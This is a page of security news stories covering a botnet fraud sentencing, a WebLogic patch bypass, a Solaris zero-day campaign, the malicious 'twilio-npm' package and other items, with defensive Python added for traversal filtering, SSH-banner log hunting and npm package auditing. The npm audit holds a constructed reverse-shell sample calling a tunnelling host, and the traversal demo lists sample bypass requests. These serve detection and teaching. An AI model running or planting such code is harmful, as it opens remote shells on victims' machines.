More stories

  •

    Russian hacker jailed over botnet data scraping scheme that drained victim bank accounts

    A Russian cybercriminal has been jailed for eight years for his part in a botnet scheme that, according to prosecutors, caused at least $100 million in intended losses.

    According to the US Department of Justice (DoJ), Aleksandr Brovko was an active member of “several elite, online forums designed for Russian-speaking cybercriminals to gather and exchange their criminal tools and services.”
    The 36-year-old, formerly of the Czech Republic, worked with other cybercriminals to scrape information gathered by botnets. 
    Brovko wrote scripts able to parse log data from botnet sources and then searched these data dumps to uncover personally identifiable information (PII) and account credentials. 
    Prosecutors say Brovko then checked the credentials his code extracted, sometimes manually, to decide whether an account was “worthwhile” to use for fraudulent transactions. Accounts judged worthwhile were handed to other threat actors, who drained them of funds.
    “Brovko possessed and trafficked over 200,000 unauthorized access devices during the course of the conspiracy,” the DoJ says. “These access devices consisted of either personally identifying information or financial account details.”

    Brovko participated in the scheme from 2007 through 2019. He has pleaded guilty to conspiracy to commit bank and wire fraud and was sentenced to eight years in prison by Senior US District Judge T.S. Ellis III. 
    As noted by The Register, Brovko’s indictment (.PDF) reveals he was retained by co-conspirator Alexander Tverdokhlebov, who was jailed for over nine years in 2017 after pleading guilty to running botnets able to control over half a million compromised PCs. 
    “Aleksandr Brovko used his programming skills to facilitate the large-scale theft and use of stolen personal and financial information, resulting in over $100 million in intended loss,” said US Attorney Zachary Terwilliger. “Our office is committed to holding these criminals accountable and protecting our communities as cybercrime becomes an ever more prominent threat.”
    In related botnet news, Imperva researchers last month published an analysis of KashmirBlack, a botnet that compromises websites through their content management system (CMS) platforms, including WordPress, Joomla, and Drupal.
    KashmirBlack has been operating since late 2019 and now attacks thousands of websites a day for purposes including cryptocurrency mining, spam, and defacement.

  •

    Oracle publishes rare out-of-band security update for WebLogic servers

    On Sunday, Oracle published a rare out-of-band security update to address an incomplete patch for a recently disclosed vulnerability in Oracle WebLogic Server that is being actively exploited in the wild.
    The new advisory, tracked as CVE-2020-14750, covers a bypass of the fix for the original bug, CVE-2020-14882, which Oracle patched in its standard quarterly Critical Patch Update in October 2020.
    CVE-2020-14882 is a critical vulnerability that lets an unauthenticated attacker execute code on a WebLogic server with the privileges of the server process, before the server’s authentication ever comes into play.
    To exploit CVE-2020-14882, an attacker only needs to send a single crafted HTTP GET request to the WebLogic administration console.

    Since exploitation is trivial, proof-of-concept (PoC) exploit code was made public within days of the initial Oracle patch [1, 2, 3, 4, 5].
    As has happened many times before, these PoCs were quickly adopted by threat actor groups, and last week SANS ISC reported attacks against its WebLogic honeypots.
    Even patched systems turned out not to be safe.

    According to Adam Boileau, Principal Security Consultant at Insomnia Sec, the original patch for CVE-2020-14882 could be bypassed by changing the case of a single character in the standard PoC exploit. In other words, the fix added a blacklist of specific traversal strings, checked against the raw request, rather than canonicalising the request path before making a decision.

    In Oracle’s rush to fix it, they made a pretty simple error: attackers could avoid the new path traversal blacklist (and thus bypass the patch) by … wait for it… changing the case of a character in their request. https://t.co/fHWPkXCAlm
    — Brett Winterford (@breditor) November 3, 2020

    The recent attacks and the bypass of the original patch are what drove Oracle to issue a second set of patches on Sunday, in a rare out-of-band security update.
    Companies that run WebLogic servers are now advised to install the additional CVE-2020-14750 patch, which protects against both the original CVE-2020-14882 exploit and its bypass. The patch is the fix; keeping the administration console off the internet limits how reachable the next bug of this kind is.
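    The bypass is the familiar failure of filtering a request by its raw spelling instead of its decoded meaning. The Python below is an added illustration, not Oracle’s code and not the actual WebLogic fix: the blocked tokens, the `/console/images/` prefix and the `/console/admin` target are constructed stand-ins. It shows a case-sensitive blacklist of the shape the tweet describes, the one-character case change that walks past it, and the alternative of decoding and normalising the path before deciding whether it stays under the prefix the server is willing to serve without authentication.

```python
import posixpath
from urllib.parse import unquote

# Constructed example, not Oracle's code. A filter of this shape compares the
# raw request path against fixed spellings of traversal sequences. Percent
# encoding is case-insensitive (%2E and %2e both decode to '.'), so a filter
# that knows only one spelling is defeated by changing one character's case.
BLOCKED_TOKENS = ("../", "%2E%2E/", "%2E%2E%2F")


def blacklist_allows(raw_path: str) -> bool:
    """Case-sensitive blacklist: rejects only exact spellings of BLOCKED_TOKENS."""
    return not any(token in raw_path for token in BLOCKED_TOKENS)


def canonical_path(raw_path: str, max_rounds: int = 3) -> str:
    """Decode the path the way the application eventually will, then normalise it.

    The query string is cut from the *raw* path first: decoding first would let an
    encoded '?' (%3F) hide the rest of the path from the check. Decoding is
    repeated (bounded) so double-encoded sequences such as %252E are resolved.
    """
    path = raw_path.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # normpath on an absolute path collapses '.' and '..' and never climbs
    # above '/', so the result can be compared against an allowed prefix.
    return posixpath.normpath("/" + path.lstrip("/"))


def allowlist_allows(raw_path: str, public_prefix: str = "/console/images/") -> bool:
    """Allowlist: canonicalise first, then require the result to stay under the
    prefix that may be served without authentication. Only the decoded,
    normalised form is judged; the raw spelling is irrelevant."""
    return canonical_path(raw_path).startswith(public_prefix)


if __name__ == "__main__":
    # '/console/images/' and '/console/admin' are made-up paths for the demo.
    for request in ("/console/images/logo.png",
                    "/console/images/%2E%2E/admin",      # blocked by both
                    "/console/images/%2e%2e/admin",      # one character's case changed
                    "/console/images/%252e%252e/admin",  # double-encoded
                    "/console/images/%3F/../../admin"):  # encoded '?' before the traversal
        print(f"{request:40} blacklist={blacklist_allows(request)!s:5} "
              f"allowlist={allowlist_allows(request)!s:5} -> {canonical_path(request)}")
```

    Run it to see the five requests side by side. Two details matter beyond the case issue: decoding is repeated so a double-encoded `%252E` is resolved, and the query string is removed from the raw path before decoding so an encoded `?` cannot hide a traversal from the check. Canonicalising the request is a layer in front of the vendor patch, not a substitute for it.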
    According to security firm Spyse, more than 3,300 WebLogic servers are currently exposed online and considered to be vulnerable to the original CVE-2020-14882 vulnerability.

  •

    Brave hits 20 million monthly users a year after 1.0 release

    Kicking off in 2016, Brave saw its first 1.0 release almost 4 years later, and following another trip around the Sun, it has hit the milestone of 20.5 million active monthly users.
    A year earlier the browser had 8.7 million monthly active users. Of the 20 million, 7 million use it daily, more than double last year’s 3 million.
    Brave added that since Apple allowed browsers other than its own to be the default option on iOS, it has seen its iOS user base increase by a third.
    One of the browser’s touted features is that it blocks ads by default, unless users opt in to see Brave-powered advertisements. On that front, Brave has hit “2 billion ad confirmation events” and completed 2,215 campaigns from over 460 companies. The browser maker says its users have a click-through rate of 9%, far above industry averages.
    The browser also has its own cryptocurrency, Basic Attention Tokens, that users use to “tip” content creators. Thus far, 26 million of the tokens have been sent to creators. At the time of writing, the blockchain-based token is trading for just under 18 cents, meaning $4.6 million has been sent from users.
    “Users are fed up with surveillance capitalism, and 20 million people have switched to Brave for an entirely new web ecosystem with an opt-in ad economy that puts them back in control of their browsing experience,” said Brendan Eich, CEO and co-founder of Brave.
    “The global privacy movement is gaining traction, and this milestone is just one more step in our journey to make privacy-by-default a standard for all Web users.”

    In June, Brave was caught out for auto-completing certain URLs to append a referral id.
    Eich said at the time it was a mistake, while others looked at Brave’s source code and found it was doing the same thing to links to Ledger, Trezor, and Coinbase.
    “The autocomplete default was inspired by search query clientid attribution that all browsers do, but unlike keyword queries, a typed-in URL should go to the domain named, without any additions. Sorry for this mistake – we are clearly not perfect, but we correct course quickly,” Eich said.
    A patch was later made to disable the functionality by default.
    While Brave boasts of its 20 million, Firefox has reported more than 10 times that number, at over 220 million. According to Statcounter, Firefox’s market share is 4% and Chrome’s is 66%, giving Chrome an install base measured in billions.

  •

    Adobe hires new CSO in Mark Adams to guide the company in its post-Flash era

    Former Blizzard Entertainment chief security officer (CSO) Mark Adams was introduced today as Adobe’s new CSO, in a role where he’ll be responsible for guiding the tech giant’s security steps in the company’s upcoming post-Flash era.
    Adams filled a role left vacant after the departure of long-time industry veteran Brad Arkin, who left Adobe after 12 years (seven as CSO) in March 2020 to join Cisco as its new Chief Security and Trust Officer.
    In his new role at Adobe, Adams will be in full control of the company’s security operations and will report to Adobe Chief Technology Officer (CTO) Abhay Parasnis.
    “He will work closely with the key cross functional teams such as IT, Product and Legal, to continue to drive and maintain the processes required to help protect Adobe and our customers,” Adobe said today in a prepared statement.
    Prior to joining Adobe today, Adams served for four years as CSO with Blizzard Entertainment, one of today’s top game makers, and the company behind market hits like World of Warcraft, Diablo, Overwatch, and StarCraft.
    From the outside, Adams’ hiring fits Adobe’s current product make-up and future strategy.
    The company is set to retire its woefully insecure Flash Player app at the end of the year, a leftover product from a bygone era, and the app that has singlehandedly soiled Adobe’s reputation for more than a decade.

    Once Flash is retired, the majority of Adobe’s product lines will be modern, cloud-centric systems, from the Creative Cloud line to its analytics, marketing, and enterprise products.
    Most are built and run much like Blizzard’s games and the Battle.net app, so Adams’ experience in cloud security engineering, data privacy, and audit/compliance fits what Adobe needs from a CSO in its post-Flash era.
    “Suffice it to say that I feel hugely honored to take on this role,” Adams wrote today on LinkedIn, following his first day on the job.

  •

    Google patches second Chrome zero-day in two weeks

    Google has released a security update today for its Chrome web browser that patches ten security bugs, including one zero-day vulnerability that is currently actively exploited in the wild.

    Identified as CVE-2020-16009, the zero-day was discovered by Google’s Threat Analysis Group (TAG), a security team at Google tasked with tracking threat actors and their ongoing operations.
    In typical Google fashion, details about the zero-day and the group exploiting the bug have not been made public — as a way to allow Chrome users more time to install the updates and prevent other threat actors from developing their own exploits for the same zero-day.
    However, in a short changelog published today, Google said the zero-day resides in V8, the Chrome component that handles JavaScript code.
    Chrome users are advised to update their browser to version 86.0.4240.183 or later.
    Second zero-day in two weeks
    This is the second Chrome zero-day that Google found exploited in the wild in the past two weeks.
    On October 20, Google also released a security update for Chrome to patch CVE-2020-15999, a zero-day in the FreeType font-rendering library bundled with Chrome.

    As Google revealed last Friday, that Chrome zero-day was chained with a Windows zero-day (CVE-2020-17087).
    The Chrome zero-day was used to execute malicious code inside Chrome, while the Windows zero-day was used to elevate the code’s privileges and attack the underlying Windows OS. Microsoft is expected to patch this zero-day on November 10, during the company’s next Patch Tuesday.
    Google didn’t clarify whether these two zero-days were abused by the same threat actor.

  •

    Hacker group uses Solaris zero-day to breach corporate networks

    Mandiant, the investigations unit of security firm FireEye, today published details about a new threat actor it calls UNC1945, which the firm says used a zero-day vulnerability in the Oracle Solaris operating system in its intrusions into corporate networks.

    Regular targets of UNC1945 attacks included the likes of telecommunications, financial, and consulting companies, the Mandiant team said in a report published today.
    Old group, new zero-day 
    While UNC1945 activity goes back as far as 2018, Mandiant said the group caught its eye earlier this year, after the threat actor used a never-before-seen vulnerability in Oracle Solaris.
    Tracked as CVE-2020-14871, the zero-day was a vulnerability in the Solaris Pluggable Authentication Module (PAM) that allowed UNC1945 to bypass authentication procedures and install a backdoor named SLAPSTICK on internet-exposed Solaris servers.
    Mandiant said the hackers then used this backdoor as an entry point to launch reconnaissance operations inside corporate networks and move laterally to other systems.
    To avoid detection, Mandiant said the group downloaded and installed a QEMU virtual machine running a version of the Tiny Core Linux OS.
    This custom Linux VM came pre-installed with hacking tools such as network scanners, password dumpers, exploits, and reconnaissance toolkits that let UNC1945 scan a company’s internal network for weaknesses and move laterally to multiple systems, regardless of whether they ran Windows or UNIX-like operating systems.


    Mandiant said it observed the group using an assortment of open-source penetration testing and security tools, but also custom malware strains.
    The open-source toolkits included Mimikatz, PowerSploit, Responder, ProcDump, CrackMapExec, PoshC2, Medusa, and the JBoss Vulnerability Scanner, all well known in the security industry.
    But UNC1945 also showed the ability to create and operate custom malware, with Mandiant linking UNC1945 intrusions to (new and old) malware strains like:
    EVILSUN – a remote exploitation tool that gains access to Solaris 10 and 11 systems of SPARC or i386 architecture using a vulnerability (CVE-2020-14871) exposed by SSH keyboard-interactive authentication. The remote exploitation tool makes SSH connections to hosts passed on the command line. The default port is the normal SSH port (22), but this may be overridden. EVILSUN passes the banner string SSH-2.0-Sun_SSH_1.1.3 over the connection in clear text as part of handshaking.
    LEMONSTICK – a Linux executable command line utility with backdoor capabilities. The backdoor can execute files, transfer files, and tunnel connections. LEMONSTICK can be started in two different ways: passing the `-c` command line argument (with an optional file) and setting the ‘OCB’ environment variable. When started with the `-c` command line argument, LEMONSTICK spawns an interactive shell. When started in OCB mode, LEMONSTICK expects to read from STDIN. The STDIN data is expected to be encrypted with the blowfish algorithm. After decrypting, it dispatches commands based on the name—for example: ‘executes terminal command’, ‘connect to remote system’, ‘send & retrieve file’, ‘create socket connection’.
    LOGBLEACH – an ELF utility that has a primary functionality of deleting log entries from a specified log file(s) based on a filter provided via command line. 
    OKSOLO – a publicly available backdoor that binds a shell to a specified port. It can be compiled to support password authentication or dropped into a root shell.
    OPENSHACKLE – a reconnaissance tool that collects information about logged-on users and saves it to a file. OPENSHACKLE registers Windows Event Manager callback to achieve persistence.
    ProxyChains – allows the use of SSH, TELNET, VNC, FTP and any other internet application from behind HTTP (HTTPS) and SOCKS (4/5) proxy servers. This “proxifier” provides proxy server support to any application.
    PUPYRAT (aka Pupy) – an open source, multi-platform (Windows, Linux, OSX, Android), multi-function RAT (Remote Administration Tool) and post-exploitation tool mainly written in Python. It features an all-in-memory execution guideline and leaves very low footprint. It can communicate using various transports, migrate into processes (reflective injection), and load remote Python code, Python packages and Python C-extensions from memory.
    STEELCORGI – a packer for Linux ELF programs that uses key material from the executing environment to decrypt the payload. When first starting up, the malware expects to find up to four environment variables that contain numeric values. The malware uses the environment variable values as a key to decrypt additional data to be executed.
    SLAPSTICK – a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.
    TINYSHELL – a lightweight client/server clone of the standard remote shell tools (rlogin, telnet, ssh, etc.), which can act as a backdoor and provide remote shell execution as well as file transfers.
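    The EVILSUN entry above gives defenders one concrete network indicator: the identification string the tool presents as an SSH client. The Python below is an added hunting example, not part of the Mandiant report or its IOC set. It reads a constructed sample in the shape of Zeek’s ssh.log (JSON lines; the field names are Zeek’s, while the hosts, uids, timestamps and outcomes are made up), matches the client banner after stripping the comment and line ending that RFC 4253 permits, and separates the matches where Zeek inferred a successful authentication.

```python
import json
from dataclasses import dataclass
from typing import List

# Client identification string the report attributes to EVILSUN.
EVILSUN_BANNER = "SSH-2.0-Sun_SSH_1.1.3"

# Constructed sample in the shape of Zeek's ssh.log as JSON lines. Field names
# follow Zeek; the addresses, uids, timestamps and outcomes are made up.
# Record CXa4 has no "client" field, as Zeek leaves it unset when it never
# saw the client's side of the version exchange.
SAMPLE_SSH_LOG = """\
{"ts": 1604300000.1, "uid": "CXa1", "id.orig_h": "203.0.113.7", "id.orig_p": 51022, "id.resp_h": "198.51.100.10", "id.resp_p": 22, "client": "SSH-2.0-Sun_SSH_1.1.3", "server": "SSH-2.0-Sun_SSH_1.1.3", "auth_success": true, "auth_attempts": 1}
{"ts": 1604300010.4, "uid": "CXa2", "id.orig_h": "10.0.0.5", "id.orig_p": 40112, "id.resp_h": "198.51.100.10", "id.resp_p": 22, "client": "SSH-2.0-OpenSSH_8.4", "server": "SSH-2.0-Sun_SSH_1.1.3", "auth_success": true, "auth_attempts": 1}
{"ts": 1604300020.9, "uid": "CXa3", "id.orig_h": "203.0.113.7", "id.orig_p": 51040, "id.resp_h": "198.51.100.11", "id.resp_p": 2222, "client": "SSH-2.0-Sun_SSH_1.1.3 ", "server": "SSH-2.0-OpenSSH_7.4", "auth_success": false, "auth_attempts": 3}
{"ts": 1604300031.0, "uid": "CXa4", "id.orig_h": "10.0.0.9", "id.orig_p": 40200, "id.resp_h": "198.51.100.10", "id.resp_p": 22, "server": "SSH-2.0-Sun_SSH_1.1.3", "auth_success": false, "auth_attempts": 0}
"""


def banner_software(ident: str) -> str:
    """Reduce an SSH identification string to its 'SSH-proto-software' token.

    RFC 4253 section 4.2 allows a comment after a space and ends the line with
    CR LF; both are dropped so cosmetic differences do not defeat the match."""
    return ident.strip("\r\n").split(" ", 1)[0]


@dataclass
class Hit:
    uid: str
    src: str
    dst: str
    dst_port: int
    auth_success: bool


def hunt(log_text: str, banner: str = EVILSUN_BANNER) -> List[Hit]:
    """Return every connection whose *client* banner matches.

    The same string is an ordinary Solaris *server* banner, so only the client
    side of the exchange is compared."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        client = rec.get("client")  # absent when Zeek never saw the exchange
        if client is None or banner_software(client) != banner:
            continue
        hits.append(Hit(uid=rec["uid"], src=rec["id.orig_h"], dst=rec["id.resp_h"],
                        dst_port=int(rec["id.resp_p"]),
                        auth_success=bool(rec.get("auth_success", False))))
    return hits


def successful_logins(hits: List[Hit]) -> List[Hit]:
    """Matches where Zeek also inferred a successful authentication: the
    connections to triage first, since the exploit's goal is a foothold."""
    return [h for h in hits if h.auth_success]


if __name__ == "__main__":
    found = hunt(SAMPLE_SSH_LOG)
    for h in found:
        flag = "AUTH OK" if h.auth_success else "auth failed"
        print(f"{h.uid}: {h.src} -> {h.dst}:{h.dst_port} ({flag})")
```

    Two caveats apply. `SSH-2.0-Sun_SSH_1.1.3` is also the normal banner of a Solaris SSH server, which is why only the client field is compared. And a banner is trivially changed, so a miss proves nothing and a hit is a lead to pivot from (the source host, and the target’s PAM modules, given that the report describes SLAPSTICK as a PAM backdoor with a hard-coded password) rather than a verdict.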
    Zero-day bought off the black market?
    Mandiant said it believes that UNC1945 bought EVILSUN (the tool that allowed them to exploit the Solaris zero-day and plant the SLAPSTICK backdoor) from a public hacking forum.
    The company said it identified an ad in April 2020 on a black-market website that promoted an “Oracle Solaris SSHD Remote Root Exploit” for $3,000.
    Mandiant said it reported the Solaris zero-day to Oracle earlier this year, after discovering traces of exploitation during an investigation.
    The zero-day (CVE-2020-14871) was patched last month in Oracle’s October 2020 security patches.
    Mandiant said that while UNC1945 has been active for several years, it spotted the Solaris zero-day in one confirmed breach; however, this doesn’t mean the zero-day wasn’t exploited against other corporate networks.
    The security firm said it “did not observe evidence of data exfiltration and was unable to determine UNC1945’s mission for most of the intrusions [they] investigated.”
    In one UNC1945 intrusion, ransomware was deployed as the final payload, but Mandiant could not link the ransomware directly to UNC1945 and said it “is likely that access to the victim environment was sold to another group.”
    Indicators of compromise and other technical details describing UNC1945 operations and intrusion patterns are available to defenders in the Mandiant report.

  •

    Malicious npm package opens backdoors on programmers' computers

    The npm security team today removed from the npm registry a malicious JavaScript library that opened backdoors on programmers’ computers.

    The JavaScript library was named “twilio-npm,” and its malicious behavior was discovered over the weekend by Sonatype, a company that monitors public package repositories as part of its developer security operations (DevSecOps) services.
    In a report published today, Sonatype said the library was first published on the npm website on Friday, was discovered on the same day, and removed today after the npm security team blacklisted the package.
    Despite a short lifespan on the npm portal, the library was downloaded more than 370 times and automatically included in JavaScript projects built and managed via the npm (Node Package Manager) command-line utility.
    Ax Sharma, the Sonatype security researcher who discovered and analyzed the library, said the malicious code found in the fake Twilio library opened a TCP reverse shell on all computers where the library was downloaded and imported inside JavaScript/npm/Node.js projects.
    The reverse shell opened a connection to “4.tcp.ngrok[.]io:11425” from where it waited to receive new commands to run on the infected users’ computers.
    Sharma said the reverse shell only worked on UNIX-based operating systems.
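    A pre-install audit of the kind Sonatype runs at registry scale can also be run locally on a package before it enters a build. The Python below is an added example, not Sonatype’s or npm’s tooling: it inspects an unpacked package given as a map of file paths to contents, reports any install-time lifecycle hook, and flags a JavaScript file that combines a spawned shell, an outbound socket and stdio piping, which is the shape of the reverse-shell behaviour the report describes. The two sample packages, the `7.tcp.ngrok.io` host and port 4444 are constructed for the demo.

```python
import json
import re
from typing import Dict, List

# Lifecycle hooks npm runs automatically during install.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics for a Node.js reverse shell: a spawned shell whose stdio is wired
# to an outbound socket. Each alone is common in legitimate code; the
# combination in one file is what the audit flags.
SHELL_SPAWN = re.compile(r"""require\(\s*['"]child_process['"]\s*\)|\bspawn\s*\(\s*['"](?:/bin/)?(?:sh|bash|cmd(?:\.exe)?)['"]""")
NET_CONNECT = re.compile(r"""require\(\s*['"](?:net|tls)['"]\s*\)|\.connect\s*\(""")
STDIO_PIPE = re.compile(r"""\.pipe\s*\(|\.stdin\b|\.stdout\b""")
# ngrok TCP tunnels are addressed as <n>.tcp.ngrok.io; one hard-coded into a
# library is worth a look on its own.
TUNNEL_HOST = re.compile(r"\b\d+\.tcp\.ngrok\.io\b")


def audit_package(files: Dict[str, str]) -> List[str]:
    """Audit an unpacked package given as {relative path: content}.

    Returns human-readable findings; an empty list means nothing matched."""
    findings: List[str] = []
    manifest = json.loads(files.get("package.json", "{}"))
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in INSTALL_HOOKS:
            findings.append(f"package.json: install hook '{hook}' runs: {cmd}")
    for name, src in files.items():
        if not name.endswith(".js"):
            continue
        spawn, net, pipe = (bool(p.search(src)) for p in (SHELL_SPAWN, NET_CONNECT, STDIO_PIPE))
        if spawn and net and pipe:
            findings.append(f"{name}: shell spawn + outbound connect + stdio piping (reverse-shell pattern)")
        elif spawn and net:
            findings.append(f"{name}: child_process and network use in the same file (review)")
        for m in TUNNEL_HOST.finditer(src):
            findings.append(f"{name}: hard-coded tunnelling host {m.group(0)}")
    return findings


# Constructed packages for the demo; names, hostname and port are made up.
SUSPECT_PACKAGE = {
    "package.json": json.dumps({"name": "constructed-suspect", "version": "1.0.0",
                                "scripts": {"postinstall": "node ./setup.js"}}),
    "setup.js": (
        'var net = require("net"), cp = require("child_process");\n'
        'var sh = cp.spawn("/bin/sh", []);\n'
        'var c = new net.Socket();\n'
        'c.connect(4444, "7.tcp.ngrok.io", function () {\n'
        '  c.pipe(sh.stdin); sh.stdout.pipe(c); sh.stderr.pipe(c);\n'
        '});\n'),
    "index.js": "module.exports = require('./lib');\n",
}

CLEAN_PACKAGE = {
    "package.json": json.dumps({"name": "constructed-clean", "version": "1.0.0",
                                "scripts": {"test": "node test.js"}}),
    "index.js": "module.exports = function pad(s, n) { return s.padStart(n); };\n",
}

if __name__ == "__main__":
    for label, pkg in (("suspect", SUSPECT_PACKAGE), ("clean", CLEAN_PACKAGE)):
        print(label, "->", audit_package(pkg) or "no findings")
```

    The install-hook finding on its own is not proof; plenty of legitimate packages compile native code in `postinstall`. The combination finding is the one to act on, and `npm install --ignore-scripts` keeps hooks from running while a package is under review. A library that only fires its payload when imported, as the report says this one did, is caught by the source scan rather than the hook check, which is why both are needed.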
    Developers asked to change credentials, secrets, keys

    “Any computer that has this package installed or running should be considered fully compromised,” the npm security team said today, confirming Sonatype’s investigation.
    “All secrets and keys stored on that computer should be rotated immediately from a different computer,” the npm team added.
    This marks the fourth major takedown of a malicious npm package over the past three months.
    In late August, the npm staff removed a malicious npm (JavaScript) library designed to steal sensitive files from an infected users’ browser and Discord application.
    In September, npm staff removed four npm (JavaScript) libraries for collecting user details and uploading the stolen data to a public GitHub page.
    In October, the npm team removed three npm (JavaScript) packages that were also caught opening reverse shells (backdoors) on developer computers. Those three were also discovered by Sonatype and, unlike the one found over the weekend, worked on Windows as well as UNIX-like systems.

  •

    Singapore updates data protection law to exclude user consent for 'legitimate' business purposes

    Singapore has updated its Personal Data Protection Act (PDPA) to allow local businesses to use consumer data without prior consent for some purposes, such as business improvement and research. The amendments also allow for harsher financial penalties to be meted out for data breaches, above the previous cap of SG$1 million. 
    The changes were passed in parliament on Monday, some eight years after the legislation was introduced in October 2012. The Act is administered by the Personal Data Protection Commission (PDPC).
    In his speech discussing the amendments, Singapore’s Communications and Information Minister S. Iswaran said data was a key economic asset in the digital economy, providing valuable insights that informed businesses and generating efficiencies. 

    It also empowered innovation and enhanced products, and was a critical resource for emerging technologies such as artificial intelligence (AI) that held transformative potential, Iswaran said. 
    Singapore’s regulatory architecture, therefore, must evolve and keep pace with these shifts, he noted. Pointing to efforts in establishing digital economy agreements, he said such initiatives positioned the Asian nation as “a key node in the global network of digital flow and transactions”. 
    The amendments to the PDPA would ensure its legislation regime was “fit for purpose” for a digital economy with a complex data landscape, he said, adding that this must be built on trust. Consumers must have confidence their personal data would be secure and used responsibly, even as they benefitted from digital opportunities and data-driven services, the minister said. 
    Companies also needed certainty to harness personal data for legitimate business purposes with the requisite safeguards and accountability, Iswaran said. 

    He noted that the amendments sought to strike a balance to maximise the benefit and minimise the risk of collecting and using personal data. 
    Amongst the key changes is the “exceptions to the consent” requirement, which now allows businesses to use, collect, and disclose data for “legitimate purposes”, business improvement, and a wider scope of research and development. In addition to existing consent exceptions that include for the purposes of investigations and responding to emergencies, these also now include efforts to combat fraud, enhance products and services, and carry out market research to understand potential customer segments. 
    In addition, further amendments defined under “deemed consent” to PDPA now would permit organisations to share data with external contractors for the purpose of fulfilling customer contracts. This catered to “modern commercial arrangements” and essential purposes including security, he said.
    Businesses also would be able to use data without consent to facilitate research and development (R&D) that might not yet be marked for productisation. 
    Iswaran explained that this could apply to research institutes running scientific R&D or educational institutes taking on social sciences research, as well as enterprises carrying out market research to identify and understand potential customer segments.
    All other purposes outside of “deemed” and “exceptions” to consent, such as direct marketing messages, still would require prior consent from consumers. 
    Organisations that suffer data breaches now might face heftier financial penalties under an amendment that allows fines of up to 10% of a company’s annual turnover or SG$1 million ($735,490), whichever is higher. Penalties previously were capped at SG$1 million.
    Amendments also were introduced to give consumers greater autonomy over data generated by their use of services and more control over how they receive commercial communications.
    A new data portability obligation would allow individuals to request that a copy of their data be transmitted to another organisation. This was expected to spur competition and benefit consumers by encouraging the development of substitute or normal services.
    Because it was a relatively new concept in Singapore, Iswaran said data portability would be rolled out in phases. More details would be announced at a later stage, including the categories of data that should be portable as well as other technical and consumer protection guidelines.
    Several Members of Parliament expressed concerns that the amendments, specifically with regards to exceptions and deemed consent, would be too broad and might be abused by organisations. 

    “Legitimate interests”, for instance, could be viewed from an organisation’s perspective and its assessment subjective when considering whether these interests outweighed potential adverse effects on an individual, which was a requirement outlined in the amendment.
    In response, Iswaran said the use of data under deemed or exception to consent would be tagged with safeguards, such as requiring companies to perform risk assessments in determining what was “legitimate” and putting clear limits on how the data could be used. 
    “[To tap the exceptions consent], organisations must conduct an assessment to eliminate or reduce risks associated with the collection, use, or disclosure of personal data, and must be satisfied that the overall benefit of doing so outweighs any residual adverse effect on an individual,” he said, adding that the PDPC would outline guidelines on how companies should carry out the risk assessment.
    He added that individuals still could withdraw consent even after the opt-out period. 
    In summing up the objectives of the amendments, the minister said a “delicate balance” was critical because overcorrecting would result in an erosion of consumer trust, while going the other direction would shackle businesses and diminish the benefits on innovation and economy the government hoped to achieve. 
    Noting that legislation was not a “panacea” and could not eliminate the risk of data breaches, Iswaran said Singapore must remain nimble and interoperable.
    Laws must be complemented with good practices and these must evolve over time, he added. He urged the need for everyone to play a role and take responsibility for maintaining the security and usability of the country’s data regime. 
    He said the government formulated and enforced rules, and aimed to adapt to changing market conditions to ensure Singapore remained relevant amidst new digital requirements. Businesses, too, should recognise it was in their own interests to support a robust data regime and differentiate themselves with their data policy. 
    Consumers also should assume responsibility for their own data and, ultimately, had the choice of opting out anytime.
    According to the minister, the PDPC last year investigated 185 cases involving data breaches and issued 58 decisions. It ordered 39 organisations to pay SG$1.7 million in penalties, including the highest fines of SG$750,000 and SG$250,000, which were meted out to Integrated Health Information Systems and Singapore Health Services, respectively. 